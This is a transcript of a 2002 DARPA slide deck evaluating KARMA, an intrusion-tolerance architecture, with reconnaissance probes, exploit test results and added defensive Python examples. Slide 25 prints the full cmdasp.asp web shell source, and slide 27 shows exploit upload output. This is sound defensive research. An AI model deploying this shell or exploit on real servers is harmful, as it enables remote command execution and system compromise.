TRANSCRIPT
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 1
Aegis Research Corporation
KARMA: Kinetic Application of Redundancy to Mitigate Attacks
(Intrusion Tolerance Using Masking, Redundancy and Dispersion)
Janet Lepanto
William Weinstein
The Charles Stark Draper Laboratory, Inc.
Slide 2: Overview
• Objectives and Assumptions
• Preliminary Test Results
• Validation Test Strategy
Slide 3: Objectives and Assumptions
• Objectives
– Employ only a small set of trusted components to protect a large set of untrusted, unmodified COTS servers and databases
– Minimize loss of data confidentiality and integrity in the presence of a successful attack on one of the servers
– Tolerate attacks whose specific signatures are not known a priori
• Assumptions
– Attacker desires stealth, so transaction rates will be relatively low
– Attacks employing high transaction rates and recognizable signatures will be addressed by front-end firewalls and/or other intrusion detection mechanisms
– Exploitation of latent vulnerabilities will require more than a single transaction
Slide 4: Architecture
[Architecture diagram: External WAN, External Firewall, Gateway, Switched IP, Server(1), Server(2) ... Server(N), Switched IP, Transaction Mediator, Database, Configuration Manager. Legend: COTS, Trusted, Other.]
Slide 5: Mechanisms
• Gateway
– Mask identities of origin server operating systems and web server applications
– Distribute client transactions among the origin servers such that the client cannot predict which server will handle a transaction
• Configuration Manager
– Monitor status of origin servers (via agent on each server) for anomalies
– Reconfigure server to “clean” state if anomalies are detected
• Transaction Mediator
– Log transactions to back-end database to support rollback recovery
Slide 6: KARMA Preliminary Testing
• Discovery
– OS identification
– Web server enumeration
– Probing with malformed request
• Web Server Exploitation
– Buffer overflow exploit to get shell command
– Unicode exploit
– Multi-transaction Unicode attack to plant executable
– Smart multi-transaction attack with server agents active
Slide 7: Discovery (OS Identification)
• OS identification attempts to guess the operating system and version of a remote system
• Freely available programs used for OS identification include xprobe (ICMP based), queso, and nmap
• By identifying the specific operating system of a target platform, a hacker can focus the attack, minimizing time and attack signatures
• KARMA masks OS identity of the Gateway
Slide 8: Discovery (OS Identification)
• OS identification run against KARMA public IP address
• Unable to determine OS of remote system
• Time required for this activity is relatively long
[root@aegis With-KARMA]# nmap -sT -n -r -p 80 -P0 -O its.c4i.draper.com
Starting nmap V. 2.53 by [email protected] ( www.insecure.org/nmap/ )
Interesting ports on (192.80.95.40):
Port State Service
80/tcp open http
TCP Sequence Prediction: Class=random positive increments
Difficulty=38245 (Worthy challenge)
No OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
Nmap run completed – 1 IP address (1 hosts up) scanned in 24 seconds
Slide 9: Discovery (Web Server Enumeration)
• Web server enumeration attempts to remotely determine the currently running version of web server software
• In response to a HEAD command, web servers typically reveal the version of the software in the “Server” field of the HTTP response
• Successful enumeration allows a hacker to focus the attack against the specific web server software
• KARMA scrubs web server responses to mask the identity of the responding web server
– Removes specific identifying information (e.g., “Server” header)
– Removes server-unique information such as ETags
– Reformats error responses to mask server-unique implementations
Slide 10: Discovery (Web Server Enumeration)
• Probe web server directly
• Issue the HEAD command to the server
• “Server” field identifies the server as Microsoft-IIS/4.0
[root@mystic Without-KARMA]# nc 192.168.0.14 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: http://192.168.0.14/Default.htm
Date: Fri, 04 Jan 2002 19:41:23 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 02 Jan 2002 21:36:45 GMT
ETag: "804e5a95c5ec11:b84"
Content-Length: 6783
Slide 11: Discovery (Web Server Enumeration)
• Probe web server via KARMA
• Issue the HEAD command to the server
• “Server” field no longer present in the HTTP response
[root@aegis With-KARMA]# nc its.c4i.draper.com 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Connection: close
Date: Fri, 04 Jan 2002 22:40:28 GMT
Accept-Ranges: bytes
Content-Length: 6913
Content-Type: text/html
Last-Modified: Wed, 02 Jan 2002 21:36:45 GMT
Slide 12: Discovery (Probing with a Malformed Request)
• Systems often disclose information when responding to erroneous conditions
• Attackers can trigger such disclosure and use the information to create a blueprint of the target network
• Upon receiving a malformed request for an existing directory, the web server responds with an error message that contains its internal IP address
• KARMA sanitizes error responses from the web servers and then forwards them to the user
Slide 13: Discovery (Probing with a Malformed Request)
• Issue “GET /html” directly to an origin server
• The web server returns a “302 Object Moved” error
• Error message contains the internal IP address
[root@mystic Without-KARMA]# nc 192.168.0.14 80
GET /html HTTP/1.0

HTTP/1.1 302 Object Moved
Location: http://192.168.0.14/html/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: 141

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found
<a HREF="http://192.168.0.14/html/">here</a></body>
Slide 14: Discovery (Probing with a Malformed Request)
• Issue “GET /html” via KARMA
• Web server returns a “301 Moved Permanently” error
• Error message does not contain internal IP address
[root@aegis With-KARMA]# nc its.c4i.draper.com 80
GET /html HTTP/1.0

HTTP/1.1 301 Moved Permanently
Connection: close
Location: http://its.c4i.draper.com/html/
Content-Length: 254

<HTML><HEAD><TITLE>301 - Moved Permanently</TITLE></HEAD>
<BODY><FONT SIZE=6><B>301 - Moved Permanently</B></FONT><BR><BR><FONT SIZE=4>
<a href=" http://its.c4i.draper.com/html/"> http://its.c4i.draper.com/html/</a></FONT>
</BODY></HTML>
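The scrubbing the Gateway performs in slides 9 to 14, written out as an added example (this is not code from the KARMA project): it drops the product and instance headers, rewrites the Location of an origin redirect to the public host name, and re-issues the origin's redirect page as a generic one. PUBLIC_HOST, ORIGIN_NET and the two sample responses are constructed from the captures above.

```python
"""Added example, not KARMA's own code: Gateway-style response scrubbing.
Assumed values: PUBLIC_HOST (the name clients connect to) and ORIGIN_NET
(the origin-server LAN) are placeholders taken from the slide captures."""
import ipaddress
import re
from typing import List, Tuple

PUBLIC_HOST = "its.c4i.draper.com"
ORIGIN_NET = ipaddress.ip_network("192.168.0.0/24")

# Header names that identify a server product or one particular origin instance.
STRIP_HEADERS = {"server", "etag", "content-location", "x-powered-by"}

# Generic redirect page in the shape the slide 14 capture shows KARMA returning.
GENERIC_301_BODY = (
    "<HTML><HEAD><TITLE>301 - Moved Permanently</TITLE></HEAD>\r\n"
    "<BODY><FONT SIZE=6><B>301 - Moved Permanently</B></FONT><BR><BR>"
    "<FONT SIZE=4>\r\n<a href=\"{url}\">{url}</a></FONT>\r\n</BODY></HTML>\r\n"
)
IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_response(raw: bytes) -> Tuple[str, List[Tuple[str, str]], bytes]:
    """Split a raw HTTP/1.x response into status line, header pairs and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def rewrite_url(url: str) -> str:
    """Replace an origin-LAN address in a URL with the Gateway's public name."""
    m = re.match(r"^(https?://)([^/:]+)(:\d+)?(.*)$", url.strip())
    if not m:
        return url
    scheme, host, _port, rest = m.groups()
    try:
        if ipaddress.ip_address(host) in ORIGIN_NET:
            return f"{scheme}{PUBLIC_HOST}{rest}"
    except ValueError:  # host is a name, not an address
        pass
    return url


def scrub(raw: bytes) -> bytes:
    """Return the origin response with identifying material removed."""
    status, headers, body = parse_response(raw)
    version, code = status.split()[0], int(status.split()[1])
    kept = []
    for name, value in headers:
        key = name.lower()
        if key in STRIP_HEADERS or key == "connection":
            continue
        if key == "location":
            value = rewrite_url(value)
        kept.append((name, value))
    if 300 <= code < 400:
        # Slides 13 and 14: the origin's "302 Object Moved" page names its
        # internal address, so the redirect is re-issued as a generic 301
        # whose only URL is the already rewritten Location.
        location = next((v for n, v in kept if n.lower() == "location"), "/")
        status = f"{version} 301 Moved Permanently"
        body = GENERIC_301_BODY.format(url=location).encode("latin-1")
        kept = [(n, v) for n, v in kept
                if n.lower() not in ("content-length", "content-type")]
        kept.append(("Content-Length", str(len(body))))
    # A HEAD response keeps its original Content-Length: there is no body to measure.
    lines = [status, "Connection: close"] + [f"{n}: {v}" for n, v in kept]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


def leaks_origin_address(raw: bytes) -> bool:
    """Verification check: does any origin-LAN address survive in the response?"""
    for m in IPV4_RE.findall(raw):
        try:
            if ipaddress.ip_address(m.decode()) in ORIGIN_NET:
                return True
        except ValueError:
            pass
    return False


# Constructed inputs modelled on the slide 10 and slide 13 captures.
ORIGIN_HEAD_200 = (
    b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/4.0\r\n"
    b"Content-Location: http://192.168.0.14/Default.htm\r\n"
    b"Date: Fri, 04 Jan 2002 19:41:23 GMT\r\nContent-Type: text/html\r\n"
    b"Accept-Ranges: bytes\r\nLast-Modified: Wed, 02 Jan 2002 21:36:45 GMT\r\n"
    b'ETag: "804e5a95c5ec11:b84"\r\nContent-Length: 6783\r\n\r\n'
)
ORIGIN_302 = (
    b"HTTP/1.1 302 Object Moved\r\nLocation: http://192.168.0.14/html/\r\n"
    b"Server: Microsoft-IIS/4.0\r\nContent-Type: text/html\r\nContent-Length: 141\r\n\r\n"
    b"<head><title>Document Moved</title></head>\r\n"
    b"<body><h1>Object Moved</h1>This document may be found\r\n"
    b'<a HREF="http://192.168.0.14/html/">here</a></body>'
)

if __name__ == "__main__":
    for sample in (ORIGIN_HEAD_200, ORIGIN_302):
        out = scrub(sample)
        print(out.decode("latin-1"), "leaks origin address:", leaks_origin_address(out))
```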
Slide 15: Web Server Exploitation (Buffer Overflow)
• Windows 2000 Internet printing ISAPI extension is vulnerable to a buffer overflow exploit
• Exploit causes buffer overflow on the IIS web server, which returns a command shell to the attacker on TCP port 81
• This command shell has administrator-level access, enabling the attacker to modify all data on the machine and launch additional attacks from the compromised server
Slide 16: Web Server Exploitation (Buffer Overflow)
• Execute directly against server and listen for shell on port 81
• Command shell returned from server
• “ver” command returns the version of Windows
• “ipconfig /all” reports the server’s network configuration
Slide 17: Web Server Exploitation (Buffer Overflow)
• Execute via KARMA and listen for shell on port 81
• Unsuccessful, command shell is never returned
• Attack is thwarted
Slide 18: Web Server Exploitation (Unicode Exploit)
• Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot “../” directory traversal exploitation if extended Unicode character representations are used in substitution for “/” and “\” (such as %c0 and %af)
• This vulnerability enables unauthenticated users to access any known file or program on the web server
• Successful exploitation would yield the same privileges as a user who could remotely log onto the system with no credentials
Slide 19: Web Server Exploitation (Unicode Exploit)
• Execute Unicode attack directly against server
• “dir c:\” reveals the contents of the root directory
• “ver” command returns the version of Windows
Slide 20: Web Server Exploitation (Unicode Exploit)
• Execute Unicode attack via KARMA
• “dir c:\” sent to server several times before success
• “ver” returns error message for every request
Slide 21: Web Server Exploitation (Multi-Transaction)
• A multi-transaction Unicode attack requires a sequence of successful Unicode requests (transactions), for example uploading a file line by line using the Windows “echo” command
• Attacker uploads scripts to exploit the web server
– cmdasp.asp (exploit allows the attacker to execute commands with system level privileges)
– upload.asp (script allows an attacker to upload files via HTTP)
• KARMA dispersion makes multi-transaction attacks more difficult
– Increases the time required to exploit the web server
– Increases the attack signature and probability of detection
Slide 22: Web Server Exploitation (Multi-Transaction)
• unicodeloader.pl uploads the file cmdasp.asp line by line utilizing the “echo” command in multiple Unicode strings
• cmdasp.asp – web script to exploit local Windows vulnerability that enables the attacker to execute commands with system level privileges
• Attacker accesses cmdasp.asp with a web browser and enters commands
Slide 23: Web Server Exploitation (Multi-Transaction)
• Attack web server directly
Slide 24: Web Server Exploitation (Multi-Transaction)
• Attack web servers via KARMA
Slide 25: Web Server Exploitation (Multi-Transaction)
“cmdasp.asp” without KARMA
1 - <%@ Language=VBScript %>
2 - <%
3 - Dim oScript
4 - Dim oScriptNet
5 - Dim oFileSys, oFile
6 - Dim szCMD, szTempFile
7 - On Error Resume Next
8 - Set oScript = Server.CreateObject("WSCRIPT.SHELL")
9 - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
11 - szCMD = Request.Form(".CMD")
12 - If (szCMD <> "") Then
13 - szTempFile = "C:\" & oFileSys.GetTempName( )
14 - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
15 - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
16 - End If
17 - %>
18 - <HTML>
19 - <BODY>
20 - <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
21 - <input type=text name=".CMD" size=45 value="<%= szCMD %>">
22 - <input type=submit value="Run">
23 - </FORM>
24 - <PRE>
25 - <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
26 - <br>
27 - <%
28 - If (IsObject(oFile)) Then
29 - On Error Resume Next
30 - Response.Write Server.HTMLEncode(oFile.ReadAll)
31 - oFile.Close
32 - Call oFileSys.DeleteFile(szTempFile, True)
33 - End If
34 - %>
35 - </BODY>
36 - </HTML>
“cmdasp.asp” with KARMA
3 - Dim oScriptNet
10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
13 - szTempFile = "C:\" & oFileSys.GetTempName( )
17 - %>
20 - <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
23 - </FORM>
25 - <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
28 - If (IsObject(oFile)) Then
32 - Call oFileSys.DeleteFile(szTempFile, True)
36 - </HTML>
Slide 26: Web Server Exploitation (KARMA Server Agents Active)
• An attacker with detailed knowledge of the KARMA environment can initiate an advanced multi-transaction Unicode attack with error checking
• Upload a line of the script and then repeatedly check for success
– Create unique directory and “echo” first line of script
– Check unique directory for file size to verify successful upload
– If successful, “echo” line two and continue process; else retry first line
• Server Agent detects changes to origin server configuration
– Server stopped and taken out of service by Configuration Manager
– Rebuilt from trusted archive
– Returned to service
Slide 27: Web Server Exploitation (KARMA Server Agents Active)
• Advanced Unicode upload utility with error checking
• First line successfully uploaded to server on first attempt
• Second line fails several times due to dispersion mechanism
• Agent identifies attack and shuts down server
[root@aegis With-KARMA]# adv-uniloader.pl 192.80.95.40:80 cmdasp.asp
exploiting directory: C:\Inetpub\scripts\adv-uniloader
uploading ASP section:
sending line 1 of 36
Checking directory for upload..
Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes.
sending line 2 of 36
Checking directory for upload..
Upload NOT successfull cmdasp.asp is still 4482 bytes
sending line 2 of 36
Checking directory for upload..
Upload NOT successfull cmdasp.asp is still 4482 bytes
sending line 2 of 36
Checking directory for upload..
Line uploaded SUCCESSFULL. cmdasp.asp is now 4487 bytes.
sending line 3 of 36
Checking directory for upload..
Checking directory for upload..
Checking directory for upload..
Checking directory for upload..
Checking directory for upload..
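A small model of what the dispersion mechanism of slide 5 does to the multi-transaction attacks of slides 21 and 27, as an added example that is not part of the presentation. It assumes, which the slides do not state, that the Gateway picks one of n_servers origin servers uniformly at random per transaction and that a file built line by line grows only on the server that already holds the partial file, so every retry that lands elsewhere is one more failed, loggable request.

```python
"""Added example, not part of the KARMA presentation: expected cost, in
transactions and in failed (visible) transactions, of a line-by-line upload
against a Gateway that disperses each transaction at random.
Constructed assumptions: uniform random server choice; the partial file lives
on exactly one server; a line reaching any other server is a failed attempt."""
import random
from typing import Tuple


def naive_success_probability(n_servers: int, n_lines: int) -> float:
    """unicodeloader.pl style (slide 22): each line is sent once, with no
    check.  The file is complete only if all n_lines land on one server."""
    return float(n_servers) ** -(n_lines - 1)


def expected_retry_cost(n_servers: int, n_lines: int) -> Tuple[int, int]:
    """adv-uniloader.pl style (slide 26): each line after the first is resent
    until it reaches the server holding the partial file, which happens with
    probability 1/n_servers per attempt (geometric, mean n_servers attempts).
    Returns (expected transactions, expected failed transactions)."""
    later = n_lines - 1
    return 1 + later * n_servers, later * (n_servers - 1)


def simulate_retry_attack(n_servers: int, n_lines: int, trials: int,
                          seed: int = 1) -> Tuple[float, float]:
    """Monte Carlo check of expected_retry_cost: mean transactions and mean
    failures per completed upload over `trials` runs (seeded, repeatable)."""
    rng = random.Random(seed)
    total_tx = total_failed = 0
    for _ in range(trials):
        holder = rng.randrange(n_servers)  # line 1 creates the file wherever it lands
        tx, failed = 1, 0
        for _line in range(2, n_lines + 1):
            while rng.randrange(n_servers) != holder:
                tx += 1
                failed += 1  # wrong server: the file does not grow (slide 27 "NOT successfull")
            tx += 1          # the attempt that reached the holder
        total_tx += tx
        total_failed += failed
    return total_tx / trials, total_failed / trials


def simulate_naive_attack(n_servers: int, n_lines: int, trials: int,
                          seed: int = 1) -> float:
    """Fraction of single-pass uploads that end with a complete file."""
    rng = random.Random(seed)
    complete = 0
    for _ in range(trials):
        landed = {rng.randrange(n_servers) for _ in range(n_lines)}
        complete += len(landed) == 1
    return complete / trials


if __name__ == "__main__":
    servers, lines = 4, 36  # 36 lines, as in the cmdasp.asp upload of slide 27
    print("single pass, whole file on one server:", naive_success_probability(servers, lines))
    print("with retries, expected (tx, failed):", expected_retry_cost(servers, lines))
    print("simulated (tx, failed):", simulate_retry_attack(servers, lines, 2000))
```

Without dispersion (n_servers = 1) both functions give the single-pass result, 36 transactions and no failures; each extra origin server multiplies the attacker's traffic and hands the detector one failed request per extra server per line.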
Slide 28: Web Server Exploitation (KARMA Server Agent Log)
• Server 4 Agent log file
• No anomalies detected by the Server Agent on server 4
• Attack detected, stop server, refresh content to original data, and restart web service
• Attack remediated, server 4 back to normal operation
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 3: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 1
in tier 2: tier completion reporting, verbosity 1, failures 1
connection to CM closed: fd=164
got cleanup_restart command
The World Wide Web Publishing Service service is stopping.
The World Wide Web Publishing Service service was stopped successfully.
The IIS Admin Service service is stopping...
The IIS Admin Service service was stopped successfully.
The Content Index service is stopping.
The Content Index service was stopped successfully.
The Content Index service is starting.
The Content Index service was started successfully.
The World Wide Web Publishing Service service is starting...
The World Wide Web Publishing Service service was started successfully.
in osa: need to refresh tier 1
in osa: need to refresh tier 2
in osa: need to refresh tier 3
in osa: need to refresh tier 4
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
Slide 29: Web Server Exploitation (KARMA Configuration Manager Log)
• Configuration Manager log file
• Server agents reporting OK
• Problem identified by server 4, unauthorized file c:\inetpub\scripts\advuni\cmdasp.asp detected
• Server 4 back to normal operation, servers reporting OK
1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0
1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0
1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0
1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0
1015623467:535619 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1
1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0
1015623468:546676 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
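The reference-versus-gathered comparison that the agent and Configuration Manager logs of slides 28 and 29 imply, as an added example (not the KARMA agent's code) run over a constructed file tree: each origin file is compared with the trusted archive on size and modification time, findings are reported in the "field 4 / field 6" style of the slide 29 log line, and any finding yields the cleanup_restart verdict of slide 26. The field numbering, the extra content digest and the two trees are assumptions of this example.

```python
"""Added example, not KARMA's own agent code: manifest comparison in the
style of the slide 29 Configuration Manager log.
Assumptions: field 4 is size and field 6 is mtime, as in that log line; the
SHA-256 digest is an extra field added here; mtime nanoseconds are 0."""
import hashlib
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Entry:
    path: str
    size: int
    mtime: int   # seconds; the slide log prints "sec:nsec"
    digest: str  # hex SHA-256 of the content (not in the slides' log)


def build_manifest(tree: Dict[str, Tuple[bytes, int]]) -> Dict[str, Entry]:
    """tree maps path -> (content, mtime).  Keys are lower-cased because the
    origin servers are Windows hosts with case-insensitive paths."""
    manifest = {}
    for path, (content, mtime) in tree.items():
        manifest[path.lower()] = Entry(path, len(content), mtime,
                                       hashlib.sha256(content).hexdigest())
    return manifest


def compare(reference: Dict[str, Entry], gathered: Dict[str, Entry]) -> List[str]:
    """One finding per file that deviates from the reference, formatted
    '<path> <number of differing fields> field 4: ... field 6: ...'."""
    findings = []
    for key, ref in reference.items():
        got = gathered.get(key)
        if got is None:
            findings.append(f"{ref.path} missing")
            continue
        diffs = []
        if got.size != ref.size:
            diffs.append(f"field 4: filesize different: ref={ref.size} gath={got.size}")
        if got.mtime != ref.mtime:
            diffs.append(f"field 6: mtime different: ref={ref.mtime}:0 gath={got.mtime}:0")
        if got.digest != ref.digest:
            diffs.append("content digest different")
        if diffs:
            findings.append(f"{ref.path} {len(diffs)} " + " ".join(diffs))
    for key, got in gathered.items():
        if key not in reference:
            findings.append(f"{got.path} unauthorized file, not in reference")
    return findings


def decide(findings: List[str]) -> str:
    """Agent verdict: any deviation from the trusted archive takes the server
    out of service for a rebuild (slide 26); otherwise it stays up."""
    return "cleanup_restart" if findings else "ok"


# Constructed trees: REFERENCE stands for the trusted archive, GATHERED for
# what the agent sees after the slide 27 upload grew cmdasp.asp to 4487 bytes.
REFERENCE = {
    r"c:\Inetpub\wwwroot\Default.htm": (b"<html>site</html>\r\n", 1010000000),
    r"c:\Inetpub\scripts\advuni\cmdasp.asp": (b"x" * 4482, 1013802544),
}
GATHERED = {
    r"c:\inetpub\wwwroot\Default.htm": (b"<html>site</html>\r\n", 1010000000),
    r"c:\Inetpub\scripts\advuni\cmdasp.asp": (b"x" * 4482 + b"<%\r\n ", 1015623975),
}


def check_server(reference=REFERENCE, gathered=GATHERED) -> Tuple[str, List[str]]:
    """Run one agent cycle: build both manifests, compare, decide."""
    findings = compare(build_manifest(reference), build_manifest(gathered))
    return decide(findings), findings


if __name__ == "__main__":
    verdict, findings = check_server()
    print(verdict)
    for finding in findings:
        print(" ", finding)
```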
Slide 30: Summary of Preliminary Test Results
• Discovery
– Scanning tools could not determine OS of Gateway
  • Origin servers not directly exposed to OS scans
– Probing to create web server error responses failed to uncover web server type
• Web Server Exploitation
– Buffer overflow of printing extension failed to return command shell
– Execution of single-string Unicode exploits slowed by dispersion mechanism
  • KARMA architecture rendered some “pseudo shell commands” ineffective
  • Exploit was able to return directory information
– Multi-transaction file buildup thwarted by dispersion mechanism
– Smart multi-transaction file buildup stopped by server agent
Slide 31: Validation Test Strategy
• Controlled Vulnerability Testing
– Configure origin servers with known weaknesses
– Compare effect of attacks directly on server with same attack via KARMA
• Blind Red Team Testing
– Configure origin servers with latest security patches
– Give the Red team no information at all about the system
– Objective is to compromise the database
• Targeted Red Team Testing
– Configure origin servers with latest security patches
– Inform the red team about the general architecture and operating strategy, but provide no details
– Objective is to compromise the database